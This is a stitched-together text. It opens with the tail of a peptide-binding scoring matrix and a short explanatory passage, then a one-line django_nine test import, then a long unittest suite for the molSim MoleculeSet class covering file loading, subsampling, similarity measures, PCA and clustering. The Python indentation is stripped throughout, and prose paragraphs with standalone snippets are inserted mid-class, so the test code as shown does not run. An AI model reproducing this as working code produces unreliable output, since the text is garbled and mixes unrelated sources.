    7: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0},
    8: {'A': 0.0, 'E': -1.8514, 'D': -1.86, 'G': -0.76974, 'F': -0.37372, 'I': 0.68078, 'H': -1.0629, 'K': -1.6348, 'M': 0.10043, 'L': 0.46076, 'N': -1.1859, 'Q': -1.5258, 'P': -1.0812, 'S': -0.24476, 'R': -0.95816, 'T': -0.22457, 'W': -1.3819, 'V': 0.28332, 'Y': -0.8679}}
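A position-specific scoring matrix like `DRB1_1601_9` maps each of the nine binder-core positions to per-residue weights; a peptide core is scored by summing `pssm[pos][residue]` over its positions. A minimal scorer over a toy two-position matrix (`pssm_score` and its weights are illustrative, not values from the table above):

```python
def pssm_score(peptide, pssm):
    """Sum the position-specific weight of each residue in the peptide."""
    return sum(pssm[pos][aa] for pos, aa in enumerate(peptide))

# Toy 2-position matrix with made-up weights.
toy_pssm = {0: {'A': 0.5, 'F': -0.1}, 1: {'A': 0.0, 'F': 1.2}}
score = pssm_score("AF", toy_pssm)  # 0.5 + 1.2
```

The large negative sentinels (-999.0) at anchor position 0 in the real matrix effectively forbid residues other than the allowed anchors (F, W, Y and the mildly penalized I, L, M, V).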
# --- newenv/lib/python3.6/site-packages/django_nine/tests/__init__.py | SashaPo/Clovin | MIT ---
from .test_versions import *
# --- tests/test_MoleculeSet.py | himaghna/molSim | MIT ---
"""Test the MoleculeSet class."""
from os import remove, mkdir
import os.path
from shutil import rmtree
import unittest
import numpy as np
import pandas as pd
from rdkit.Chem import MolFromSmiles
from rdkit.Chem.rdmolfiles import MolToPDBFile
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from molSim.chemical_datastructures import Molecule, MoleculeSet
from molSim.ops import Descriptor, SimilarityMeasure
from molSim.exceptions import NotInitializedError, InvalidConfigurationError
SUPPORTED_SIMILARITIES = SimilarityMeasure.get_supported_metrics()
SUPPORTED_FPRINTS = Descriptor.get_supported_fprints()
class TestMoleculeSet(unittest.TestCase):
test_smarts = [
"[CH3:1][S:2][c:3]1[cH:4][cH:5][c:6]([B:7]([OH:8])[OH:9])[cH:10][cH:11]1",
"[NH:1]1[CH2:2][CH2:3][O:4][CH2:5][CH2:6]1.[O:7]=[S:8]=[O:9]",
]
test_smiles = [
"CCCCCCC",
"CCCC",
"CCC",
"CO",
"CN",
"C1=CC=CC=C1",
"CC1=CC=CC=C1",
"C(=O)(N)N",
]
def smiles_seq_to_textfile(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a text file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created file.
"""
text_fpath = "temp_smiles_seq.txt"
print(f"Creating text file {text_fpath}")
with open(text_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smiles):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smiles) - 1:
write_txt += "\n"
fp.write(write_txt)
return text_fpath
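The text files written by this helper hold one molecule per line: the SMILES string first, optionally followed by a space and the response value. Reading a line back is a simple split; a stdlib sketch of the inverse parse (`parse_line` is hypothetical, not part of molSim):

```python
def parse_line(line):
    """Split a 'SMILES[ property]' line into (smiles, float-or-None)."""
    parts = line.strip().split()
    smiles = parts[0]
    prop = float(parts[1]) if len(parts) > 1 else None
    return smiles, prop
```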
def smiles_seq_to_smi_file(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a .smi file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created file.
"""
smi_fpath = "temp_smiles_seq.smi"
print(f"Creating text file {smi_fpath}")
with open(smi_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smiles):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smiles) - 1:
write_txt += "\n"
fp.write(write_txt)
return smi_fpath
def smiles_seq_to_smiles_file(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a .SMILES file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created file.
"""
SMILES_fpath = "temp_smiles_seq.SMILES"
print(f"Creating text file {SMILES_fpath}")
with open(SMILES_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smiles):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smiles) - 1:
write_txt += "\n"
fp.write(write_txt)
return SMILES_fpath
def smarts_seq_to_smiles_file(self, property_seq=None):
"""Helper method to convert a SMARTS sequence to a .SMILES file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created file.
"""
SMILES_fpath = "temp_smiles_seq.SMILES"
print(f"Creating text file {SMILES_fpath}")
with open(SMILES_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smarts):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smarts) - 1:
write_txt += "\n"
fp.write(write_txt)
return SMILES_fpath
def smiles_seq_to_pdb_dir(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a pdb files
stored in a directory.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created directory.
"""
dir_path = "test_dir"
if not os.path.isdir(dir_path):
print(f"Creating directory {dir_path}")
mkdir(dir_path)
for smiles_str in self.test_smiles:
mol_graph = MolFromSmiles(smiles_str)
assert mol_graph is not None
pdb_fpath = os.path.join(dir_path, smiles_str + ".pdb")
print(f"Creating file {pdb_fpath}")
MolToPDBFile(mol_graph, pdb_fpath)
return dir_path
def smiles_seq_to_xl_or_csv(
self, ftype, property_seq=None, name_seq=None, feature_arr=None
):
"""Helper method to convert a SMILES sequence or arbitrary features
to Excel or CSV files.
Args:
ftype (str): String label to denote the filetype. 'csv' or 'excel'.
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
name_seq (list or np.ndarray, optional): Optional sequence of
molecular names. Defaults to None.
feature_arr (np.ndarray, optional): Optional array of molecular
descriptor values. Defaults to None.
Raises:
ValueError: Invalid file type specified.
Returns:
str: Path to created file.
"""
data = {"feature_smiles": self.test_smiles}
if property_seq is not None:
data.update({"response_random": property_seq})
if name_seq is not None:
data.update({"feature_name": name_seq})
if feature_arr is not None:
feature_arr = np.array(feature_arr)
for feature_num in range(feature_arr.shape[1]):
data.update({f"feature_{feature_num}":
feature_arr[:, feature_num]})
data_df = pd.DataFrame(data)
fpath = "temp_mol_file"
if ftype == "excel":
fpath += ".xlsx"
print(f"Creating {ftype} file {fpath}")
data_df.to_excel(fpath)
elif ftype == "csv":
fpath += ".csv"
print(f"Creating {ftype} file {fpath}")
data_df.to_csv(fpath)
else:
raise ValueError(f"{ftype} not supported")
return fpath
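The CSV/Excel layout produced here is columnar: `feature_smiles` is always present, `response_random` and `feature_name` are optional, and a descriptor array is expanded into `feature_0`, `feature_1`, ... columns. The same layout with only the stdlib `csv` module (`write_mol_csv` is a hypothetical sketch, not the pandas path used above):

```python
import csv
import io

def write_mol_csv(smiles, feature_arr=None):
    """Write feature_smiles plus expanded feature_<i> columns as CSV text."""
    n_feats = len(feature_arr[0]) if feature_arr else 0
    header = ["feature_smiles"] + [f"feature_{i}" for i in range(n_feats)]
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(header)
    for row_id, smi in enumerate(smiles):
        row = [smi] + (list(feature_arr[row_id]) if feature_arr else [])
        writer.writerow(row)
    return buf.getvalue()

csv_text = write_mol_csv(["CO", "CN"], [[0.1, 0.2], [0.3, 0.4]])
```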
def test_set_molecule_database_from_textfile(self):
"""
Test to create MoleculeSet object by reading molecule database
from a textfile.
"""
text_fpath = self.smiles_seq_to_textfile()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object to be smiles",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_smi_file(self):
"""
Test to create MoleculeSet object by reading molecule database
from a smi file.
"""
text_fpath = self.smiles_seq_to_smi_file()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object to be smiles",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_smiles_file(self):
"""
Test to create MoleculeSet object by reading molecule database
from a SMILES file.
"""
text_fpath = self.smiles_seq_to_smiles_file()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object to be smiles",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_smarts_file(self):
"""
Test to create MoleculeSet object by reading molecule database
from a SMILES file containing SMARTS strings.
"""
text_fpath = self.smarts_seq_to_smiles_file()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smarts),
"Expected the size of database to be equal to number "
"of SMARTS in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smarts[id],
"Expected mol_text attribute of Molecule object to be the SMARTS string",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_subsample_molecule_database_from_textfile(self):
"""
Test to randomly subsample a molecule database loaded from a textfile.
"""
text_fpath = self.smiles_seq_to_textfile()
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
sampling_ratio=sampling_ratio,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of subsampled database to be equal "
"to number of smiles in text file * sampling_ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_w_property_from_textfile(self):
"""
Test to create MoleculeSet object by reading molecule database
and molecular responses from a textfile.
"""
properties = np.random.normal(size=len(self.test_smiles))
text_fpath = self.smiles_seq_to_textfile(property_seq=properties)
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object " "to be smiles",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of "
"Molecule object "
"to be set to value in text file",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_pdb_dir(self):
"""
Test to create MoleculeSet object by reading molecule database
from a directory of pdb files.
"""
dir_path = self.smiles_seq_to_pdb_dir(self.test_smiles)
molecule_set = MoleculeSet(
molecule_database_src=dir_path,
molecule_database_src_type="directory",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose, "Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from dir",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number " "of files in dir",
)
for molecule in molecule_set.molecule_database:
self.assertIn(
molecule.mol_text,
self.test_smiles,
"Expected molecule text to be a smiles string",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting directory {dir_path}...")
rmtree(dir_path)
def test_subsample_molecule_database_from_pdb_dir(self):
"""
Test to randomly subsample a molecule database loaded from a
directory of pdb files.
"""
dir_path = self.smiles_seq_to_pdb_dir(self.test_smiles)
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=dir_path,
molecule_database_src_type="directory",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
sampling_ratio=sampling_ratio,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from dir",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of subsampled database to be "
"equal to number of files in dir * sampling_ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting directory {dir_path}...")
rmtree(dir_path)
def test_set_molecule_database_from_excel(self):
"""
Test to create MoleculeSet object by reading molecule database
from an Excel file.
"""
xl_fpath = self.smiles_seq_to_xl_or_csv(ftype="excel")
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number of smiles",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in excel",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_subsample_molecule_database_from_excel(self):
"""
Test to randomly subsample a molecule database loaded from an
Excel file.
"""
xl_fpath = self.smiles_seq_to_xl_or_csv(ftype="excel")
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
sampling_ratio=sampling_ratio,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of subsampled database to be "
"equal to number of smiles * sampling ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_set_molecule_database_w_property_from_excel(self):
"""
Test to create MoleculeSet object by reading molecule database
and molecular responses from an Excel file.
"""
properties = np.random.normal(size=len(self.test_smiles))
xl_fpath = self.smiles_seq_to_xl_or_csv(ftype="excel",
property_seq=properties)
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in excel file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in excel",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of "
"Molecule object "
"to be set to value in excel file",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_set_molecule_database_w_descriptor_property_from_excel(self):
"""
Test to create MoleculeSet object by reading molecule database
containing arbitrary molecular descriptor values from an Excel file.
"""
properties = np.random.normal(size=len(self.test_smiles))
n_features = 20
features = np.random.normal(size=(len(self.test_smiles), n_features))
xl_fpath = self.smiles_seq_to_xl_or_csv(
ftype="excel", property_seq=properties, feature_arr=features
)
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
similarity_measure="l0_similarity",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from " "excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in excel file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in excel",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of "
"Molecule object "
"to be set to value in excel file",
)
self.assertTrue(
(molecule.descriptor.to_numpy() == features[id]).all(),
"Expected descriptor value to be same as the "
"vector used to initialize descriptor",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_set_molecule_database_from_csv(self):
"""
Test to create MoleculeSet object by reading molecule database
from a CSV file.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from " "csv file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number " "of smiles",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in csv",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_subsample_molecule_database_from_csv(self):
"""
Test to randomly subsample a molecule database loaded from a
CSV file.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
sampling_ratio=sampling_ratio,
is_verbose=True,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from csv file",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of database to be equal to number "
"of smiles * sampling_ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_property_from_csv(self):
"""
Test to create MoleculeSet object by reading molecule database
and molecular responses from a CSV file.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from csv file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in csv",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of "
"Molecule object "
"to be set to value in csv file",
)
self.assertIsInstance(molecule, Molecule)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_descriptor_property_from_csv(self):
"""
Test to create MoleculeSet object by reading molecule database
containing arbitrary molecular descriptors and molecular responses
from a CSV file.
"""
properties = np.random.normal(size=len(self.test_smiles))
n_features = 20
features = np.random.normal(size=(len(self.test_smiles), n_features))
csv_fpath = self.smiles_seq_to_xl_or_csv(
ftype="csv", property_seq=properties, feature_arr=features
)
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
similarity_measure="l0_similarity",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from " "csv file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in csv file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in csv",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of "
"Molecule object "
"to be set to value in csv file",
)
self.assertTrue(
(molecule.descriptor.to_numpy() == features[id]).all(),
"Expected descriptor value to be same as the "
"vector used to initialize descriptor",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_similarity_from_csv(self):
"""
Verify that a NotInitializedError is raised if no fingerprint_type
is specified when instantiating a MoleculeSet object.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
for similarity_measure in SUPPORTED_SIMILARITIES:
with self.assertRaises(NotInitializedError):
MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
similarity_measure=similarity_measure,
is_verbose=False,
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_fingerprint_from_csv(self):
"""
Verify that a TypeError is raised if no similarity_measure
is specified when instantiating a MoleculeSet object.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
for descriptor in SUPPORTED_FPRINTS:
with self.assertRaises(TypeError):
MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
is_verbose=False,
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_fingerprint_similarity_from_csv(self):
"""
Test all combinations of fingerprints and similarity measures with the
MoleculeSet class.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=False,
)
self.assertFalse(
molecule_set.is_verbose, "Expected is_verbose to be False"
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from csv file",
)
for molecule in molecule_set.molecule_database:
self.assertTrue(
molecule.descriptor.check_init(),
"Expected descriptor to be set",
)
self.assertIsNotNone(
molecule_set.similarity_matrix,
"Expected similarity_matrix to be set",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_get_most_similar_pairs(self):
"""
Test that all combinations of fingerprint_type and similarity measure
work with the MoleculeSet.get_most_similar_pairs() method.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=False,
)
molecule_pairs = molecule_set.get_most_similar_pairs()
self.assertIsInstance(
molecule_pairs,
list,
"Expected get_most_similar_pairs() to return list",
)
for pair in molecule_pairs:
self.assertIsInstance(
pair,
tuple,
"Expected elements of list "
"returned by get_most_similar_pairs()"
" to be tuples",
)
def test_get_most_dissimilar_pairs(self):
"""
Test that all combinations of fingerprint_type and similarity measure
work with the MoleculeSet.get_most_dissimilar_pairs() method.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=False,
)
molecule_pairs = molecule_set.get_most_dissimilar_pairs()
self.assertIsInstance(
molecule_pairs,
list,
"Expected get_most_dissimilar_pairs() " "to return list",
)
for pair in molecule_pairs:
self.assertIsInstance(
pair,
tuple,
"Expected elements of list returned"
" by get_most_dissimilar_pairs() "
"to be tuples",
)
def test_pca_transform(self):
"""
Test the unsupervised transformation of molecules in
MoleculeSet using Principal Component Analysis.
"""
n_features = 20
features = np.random.normal(size=(len(self.test_smiles), n_features))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv", feature_arr=features)
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
similarity_measure="l0_similarity",
is_verbose=True,
)
features = StandardScaler().fit_transform(features)
features = PCA().fit_transform(features)
error_matrix = features - molecule_set.get_transformed_descriptors()
error_threshold = 1e-6
self.assertLessEqual(
np.max(np.abs(error_matrix)),
error_threshold,
"Expected transformed molecular descriptors to be "
"equal to PCA decomposed features",
)
def test_clustering_fingerprints(self):
"""
Test the clustering of molecules featurized by their fingerprints.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
n_clusters = 3
for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=True,
)
with self.assertRaises(NotInitializedError):
molecule_set.get_cluster_labels()
if molecule_set.similarity_measure.is_distance_metric():
molecule_set.cluster(n_clusters=n_clusters)
